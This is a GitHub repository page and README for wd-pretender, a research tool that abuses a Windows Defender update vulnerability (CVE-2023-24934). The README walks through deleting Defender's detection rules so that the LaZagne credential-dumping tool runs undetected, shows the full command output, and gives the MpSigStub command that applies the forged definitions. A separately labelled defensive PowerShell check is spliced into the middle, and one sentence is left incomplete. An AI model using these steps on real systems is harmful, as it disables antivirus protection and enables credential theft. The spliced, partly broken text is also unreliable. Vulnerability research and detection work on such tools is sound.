https://github.com/safebreach-labs/wd-pretender
- Host: GitHub
- URL: https://github.com/safebreach-labs/wd-pretender
- Owner: SafeBreach-Labs
- License: bsd-3-clause
- Created: 2023-02-12T09:43:17.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2023-08-09T11:30:04.000Z (over 1 year ago)
- Last Synced: 2025-03-28T18:54:46.021Z (about 1 month ago)
- Language: Python
- Size: 107 KB
- Stars: 127
- Watchers: 8
- Forks: 11
- Open Issues: 1
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# wd-pretender
## TL;DR
Compatible with Windows Defender platform version 4.18.2302.7 and earlier.

## Description
wd-pretender is a powerful tool designed to simulate a Windows Defender update using the [CVE-2023-24934](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24934) vulnerability. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

## Features
- Bypass EDR Rules: Bypass certain Windows Defender security measures and remain undetected.

## Installation
Windows with Python 3.10+ and the libraries listed in `requirements.txt`.

## Usage
```
-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --
[+] Getting Signatures Location ...
usage: wd-pretender.py command [options]

Windows Defender Update

positional arguments:
  {bypass,delete,friendly}
    bypass              bypass windows defender rules by threat name
    delete              delete file by modifying rules
    friendly            add hash to friendly files threat

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT             output folder for the exported vdm files
  -d DEFINITIONS_PATH   set explicit definitions path
```

### Bypass
```
-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --
[+] Getting Signatures Location ...
usage: wd-pretender.py command [options] bypass [-h] threat_name

positional arguments:
  threat_name  delete all threats matching
```

For example, to bypass the LaZagne rules so that LaZagne can be executed without being detected by Windows Defender:
```
python wd-pretender.py -o C:\BypassDefs bypass lazagne
```

Output:
```
python .\wd-pretender.py -o C:\Definitions bypass lazagne
-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --
[+] Getting Signatures Location ...
[+] Definitions Path: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5235DDA9-EDFD-456F-A39A-88CF98DA5B71}
[+] Loading mpasbase.vdm
[+] Loading mpasdlta.vdm
[+] Loading mpavbase.vdm
[+] Loading mpavdlta.vdm
[+] Enumerating Anti-Virus Definitions
[+] Threats Containing: lazagne
Deleting => b'\xd8!LaZagne'
Deleting => b'HackTool:Python/LaZagne'
Deleting => b'HackTool:Python/LaZagne.A!MTB'
Deleting => b'\xd8!LaZagne!ml'
Deleting => b'HackTool:Python/LaZagne.D!MTB'
Deleting => b'\xcc!Golazagne.A!MTB'
Deleting => b'HackTool:Python/LaZagne.B'
Deleting => b'\xd8!LaZagne!sms'
Deleting => b'\xcc!Lazagne.A!MTB'
Deleting => b'\xcc\xe1Lazagne'
[+] Enumerating Anti-Spyware Definitions
[+] Threats Containing: lazagne
[+] Exporting Definitions into: C:\Definitions
[+] mpasdlta.vdm: 1.391.491.0 => 1.391.492.0
[+] mpavdlta.vdm: 1.391.491.0 => 1.391.492.0
[+] Done!
```
The output lists the threat rules the tool deleted: 10 threats were removed from the Anti-Virus definitions. The updated definitions are exported to the user-supplied output path, C:\BypassDefs. Next, copy MpSigStub.exe into the BypassDefs folder and run the following command:
```
MpSigStub.exe /stub 1.1.18500.10 /payload
```
The export log generated by wd-pretender confirms the presence of the updated definitions with the version indicated as . To verify that the update was applied, check the "MpSigStub.log" file in the Temp folder of the user account the command was run under. For instance, if the tool was run with administrator privileges (not a requirement), the log file is located at C:\Windows\Temp.
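A defender-side check, added here as an example and not part of wd-pretender or SafeBreach Labs' code: it reads the Defender platform, engine and signature versions from the standard `Get-MpComputerStatus` cmdlet and flags hosts whose platform version is at or below 4.18.2302.7, the ceiling stated in the TL;DR above. The `$ceiling` value is taken from this README; everything else is the cmdlet's own output, and the script changes nothing on the machine.

```powershell
# Added example, not part of wd-pretender: report Defender version state on this host
# and flag a platform version inside the README's stated compatibility range.
$ceiling = [version]'4.18.2302.7'   # platform ceiling quoted from the README TL;DR

$status   = Get-MpComputerStatus
$platform = [version]$status.AMProductVersion

# Summary a fleet inventory job can collect and compare across hosts.
[pscustomobject]@{
    ComputerName          = $env:COMPUTERNAME
    PlatformVersion       = $platform
    EngineVersion         = $status.AMEngineVersion
    AVSignatureVersion    = $status.AntivirusSignatureVersion
    ASSignatureVersion    = $status.AntispywareSignatureVersion
    AVSignatureUpdated    = $status.AntivirusSignatureLastUpdated
    WithinReadmeRange     = ($platform -le $ceiling)
}

if ($platform -le $ceiling) {
    Write-Warning ("Defender platform {0} is at or below {1}, the version range this README " +
                   "targets; install the current platform update via Windows Update." -f $platform, $ceiling)
}
```

The signature versions are included because an unexpected jump in the delta definition version (the run above shows 1.391.491.0 becoming 1.391.492.0) without a matching change from the update channel is the kind of discrepancy worth correlating against update logs.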
## License
wd-pretender is released under the BSD 3-Clause License.
Feel free to modify and distribute this tool responsibly, while adhering to the license terms.